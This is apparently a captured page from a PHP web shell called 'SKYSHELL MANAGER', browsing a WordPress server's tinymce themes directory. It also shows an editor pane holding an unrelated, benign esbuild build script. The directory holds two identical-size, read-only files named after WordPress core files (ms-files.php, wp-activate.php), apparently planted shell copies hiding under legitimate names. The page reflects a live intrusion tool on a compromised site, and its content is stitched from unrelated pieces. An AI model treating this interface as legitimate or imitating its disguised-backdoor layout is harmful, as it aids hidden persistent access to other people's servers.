📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: esbuild-build.mjs
import * as esbuild from 'esbuild' import fs from 'node:fs' const bundle = { name: 'bundle', setup (build) { build.onLoad({ filter: /lib(\/|\\)fetch(\/|\\)index.js/ }, async (args) => { const text = await fs.promises.readFile(args.path, 'utf8') return { contents: `var esbuildDetection = 1;${text}`, loader: 'js' } }) } } await esbuild.build({ entryPoints: ['index-fetch.js'], bundle: true, outfile: 'undici-fetch.js', plugins: [bundle], platform: 'node' })
Save